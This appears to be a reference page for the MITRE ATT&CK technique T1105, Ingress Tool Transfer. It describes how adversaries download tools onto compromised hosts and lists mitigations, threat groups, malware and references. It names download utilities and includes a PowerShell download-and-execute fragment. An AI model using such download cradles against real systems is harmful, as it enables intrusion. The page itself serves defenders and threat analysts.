Description
Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp. Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer).
On Windows, adversaries may use various utilities to download tools, such as copy, finger, certutil, and PowerShell commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as curl, scp, sftp, tftp, rsync, finger, and wget.(Citation: t1105_lolbas) A number of these tools, such as wget, curl, and scp, also exist on ESXi. After downloading a file, a threat actor may attempt to verify its integrity by checking its hash value (e.g., via certutil -hashfile).(Citation: Google Cloud Threat Intelligence COSCMICENERGY 2023)
Adversaries may also abuse installers and package managers, such as yum or winget, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows search-ms protocol handler, to deliver malicious files to victims through remote file searches invoked by User Execution (typically after interacting with Phishing lures).(Citation: T1105: Trellix_search-ms)
Files can also be transferred using various Web Services as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)
Platforms
Mitigations (2)
Network Intrusion PreventionM1031
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware or unusual data transfer over known protocols like FTP can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and w
Filter Network TrafficM1037
Use network filtering to block outbound traffic from compromised systems to unapproved external destinations. Restricting access to known, trusted IP addresses and protocols can prevent attackers from downloading malicious tools or payloads onto compromised servers after gaining initial access.
Threat Groups (86)
| ID | Group | Context |
|---|---|---|
| G0117 | Fox Kitten | [Fox Kitten](https://attack.mitre.org/groups/G0117) has downloaded additional tools including [PsExec](https://attack.mitre.org/software/S0029) direct... |
| G1002 | BITTER | [BITTER](https://attack.mitre.org/groups/G1002) has downloaded additional malware and tools onto a compromised host.(Citation: Cisco Talos Bitter Bang... |
| G0125 | HAFNIUM | [HAFNIUM](https://attack.mitre.org/groups/G0125) has downloaded malware and tools--including Nishang and PowerCat--onto a compromised host.(Citation: ... |
| G0080 | Cobalt Group | [Cobalt Group](https://attack.mitre.org/groups/G0080) has used public sites such as github.com and sendspace.com to upload files and then download the... |
| G1021 | Cinnamon Tempest | [Cinnamon Tempest](https://attack.mitre.org/groups/G1021) has downloaded files, including [Cobalt Strike](https://attack.mitre.org/software/S0154), to... |
| G1043 | BlackByte | [BlackByte](https://attack.mitre.org/groups/G1043) has transferred tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154) to victim en... |
| G0081 | Tropic Trooper | [Tropic Trooper](https://attack.mitre.org/groups/G0081) has used a delivered trojan to download additional files.(Citation: TrendMicro Tropic Trooper ... |
| G1015 | Scattered Spider | [Scattered Spider](https://attack.mitre.org/groups/G1015) has downloaded the Teleport remote access tool to compromised VMware vCenter Servers.(Citati... |
| G0032 | Lazarus Group | [Lazarus Group](https://attack.mitre.org/groups/G0032) has downloaded files, malware, and tools from its C2 onto a compromised host.(Citation: Novetta... |
| G0068 | PLATINUM | [PLATINUM](https://attack.mitre.org/groups/G0068) has transferred files using the Intel® Active Management Technology (AMT) Serial-over-LAN (SOL) chan... |
| G0004 | Ke3chang | [Ke3chang](https://attack.mitre.org/groups/G0004) has used tools to download files to compromised machines.(Citation: Microsoft NICKEL December 2021) |
| G0107 | Whitefly | [Whitefly](https://attack.mitre.org/groups/G0107) has the ability to download additional tools from the C2.(Citation: Symantec Whitefly March 2019) |
| G0067 | APT37 | [APT37](https://attack.mitre.org/groups/G0067) has downloaded second stage malware from compromised websites.(Citation: FireEye APT37 Feb 2018)(Citati... |
| G1008 | SideCopy | [SideCopy](https://attack.mitre.org/groups/G1008) has delivered trojanized executables via spearphishing emails that contacts actor-controlled servers... |
| G1018 | TA2541 | [TA2541](https://attack.mitre.org/groups/G1018) has used malicious scripts and macros with the ability to download additional payloads.(Citation: Cis... |
| G0094 | Kimsuky | [Kimsuky](https://attack.mitre.org/groups/G0094) has downloaded additional scripts, tools, and malware onto victim systems.(Citation: Talos Kimsuky No... |
| G0010 | Turla | [Turla](https://attack.mitre.org/groups/G0010) has used shellcode to download Meterpreter after compromising a victim.(Citation: ESET Turla Mosquito M... |
| G0047 | Gamaredon Group | [Gamaredon Group](https://attack.mitre.org/groups/G0047) has downloaded additional malware and tools onto a compromised host.(Citation: Palo Alto Gama... |
| G0065 | Leviathan | [Leviathan](https://attack.mitre.org/groups/G0065) has downloaded additional scripts and files from adversary-controlled servers.(Citation: Proofpoint... |
| G0045 | menuPass | [menuPass](https://attack.mitre.org/groups/G0045) has installed updates and new malware on victims.(Citation: PWC Cloud Hopper April 2017)(Citation: D... |
Associated Software (400)
| ID | Name | Type | Context |
|---|---|---|---|
| S0396 | EvilBunny | Malware | [EvilBunny](https://attack.mitre.org/software/S0396) has downloaded additional Lua scripts from the C2.(Citation: Cyphort EvilBunny Dec 2014) |
| S0664 | Pandora | Malware | [Pandora](https://attack.mitre.org/software/S0664) can load additional drivers and files onto a victim machine.(Citation: Trend Micro Iron Tiger April... |
| S0444 | ShimRat | Malware | [ShimRat](https://attack.mitre.org/software/S0444) can download additional files.(Citation: FOX-IT May 2016 Mofang) |
| S1228 | PUBLOAD | Malware | [PUBLOAD](https://attack.mitre.org/software/S1228) has acted as a stager that can download the next-stage payload from its C2 server.(Citation: Lab52 ... |
| S1118 | BUSHWALK | Malware | [BUSHWALK](https://attack.mitre.org/software/S1118) can write malicious payloads sent through a web request’s command parameter.(Citation: Mandiant Cu... |
| S1066 | DarkTortilla | Malware | [DarkTortilla](https://attack.mitre.org/software/S1066) can download additional packages for keylogging, cryptocurrency mining, and other capabilities... |
| S0627 | SodaMaster | Malware | [SodaMaster](https://attack.mitre.org/software/S0627) has the ability to download additional payloads from C2 to the targeted system.(Citation: Secure... |
| S1019 | Shark | Malware | [Shark](https://attack.mitre.org/software/S1019) can download additional files from its C2 via HTTP or DNS.(Citation: ClearSky Siamesekitten August 2... |
| S0284 | More_eggs | Malware | [More_eggs](https://attack.mitre.org/software/S0284) can download and launch additional payloads.(Citation: Talos Cobalt Group July 2018)(Citation: Se... |
| S0185 | SEASHARPEE | Malware | [SEASHARPEE](https://attack.mitre.org/software/S0185) can download remote files onto victims.(Citation: FireEye APT34 Webinar Dec 2017) |
| S0515 | WellMail | Malware | [WellMail](https://attack.mitre.org/software/S0515) can receive data and executable scripts from C2.(Citation: CISA WellMail July 2020) |
| S0255 | DDKONG | Malware | [DDKONG](https://attack.mitre.org/software/S0255) downloads and uploads files on the victim’s machine.(Citation: Rancor Unit42 June 2018) |
| S1048 | macOS.OSAMiner | Malware | [macOS.OSAMiner](https://attack.mitre.org/software/S1048) has used `curl` to download a [Stripped Payloads](https://attack.mitre.org/techniques/T1027/... |
| S0516 | SoreFang | Malware | [SoreFang](https://attack.mitre.org/software/S0516) can download additional payloads from C2.(Citation: CISA SoreFang July 2016)(Citation: NCSC APT29 ... |
| S1074 | ANDROMEDA | Malware | [ANDROMEDA](https://attack.mitre.org/software/S1074) can download additional payloads from C2.(Citation: Mandiant Suspected Turla Campaign February 20... |
| S1013 | ZxxZ | Malware | [ZxxZ](https://attack.mitre.org/software/S1013) can download and execute additional files.(Citation: Cisco Talos Bitter Bangladesh May 2022) |
| S0386 | Ursnif | Malware | [Ursnif](https://attack.mitre.org/software/S0386) has dropped payload and configuration files to disk. [Ursnif](https://attack.mitre.org/software/S038... |
| S1189 | Neo-reGeorg | Malware | [Neo-reGeorg](https://attack.mitre.org/software/S1189) has the ability to download files to targeted systems.(Citation: GitHub Neo-reGeorg 2019) |
| S0070 | HTTPBrowser | Malware | [HTTPBrowser](https://attack.mitre.org/software/S0070) is capable of writing a file to the compromised system from the C2 server.(Citation: Dell TG-33... |
| S1028 | Action RAT | Malware | [Action RAT](https://attack.mitre.org/software/S1028) has the ability to download additional payloads onto an infected machine.(Citation: MalwareBytes... |
References
- Mathanraj Thangaraju, Sijo Jacob. (2023, July 26). Beyond File Search: A Novel Method for Exploiting the "search-ms" URI Protocol Handler. Retrieved March 15, 2024.
- COSMICENERGY: New OT Malware Possibly Related To Russian Emergency Response Exercises. (2023, May 25). Ken Proska, Daniel Kapellmann Zafra, Keith Lunden, Corey Hildebrandt, Rushikesh Nandedkar, Nathan Brubaker. Retrieved March 18, 2025.
- David Talbot. (2013, August 21). Dropbox and Similar Services Can Sync Malware. Retrieved May 31, 2023.
- Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- LOLBAS. (n.d.). LOLBAS Mapped to T1105. Retrieved March 11, 2022.
- Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018.
Frequently Asked Questions
What is T1105 (Ingress Tool Transfer)?
T1105 is a MITRE ATT&CK technique named 'Ingress Tool Transfer'. It belongs to the Command and Control tactic(s). Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network th...
How can T1105 be detected?
Detection of T1105 (Ingress Tool Transfer) typically involves monitoring system logs, network traffic, and endpoint telemetry. Use SIEM rules, EDR solutions, and behavioral analytics to identify suspicious activity associated with this technique.
What mitigations exist for T1105?
There are 2 documented mitigations for T1105. Key mitigations include: Network Intrusion Prevention, Filter Network Traffic.
Which threat groups use T1105?
Known threat groups using T1105 include: Fox Kitten, BITTER, HAFNIUM, Cobalt Group, Cinnamon Tempest, BlackByte, Tropic Trooper, Scattered Spider.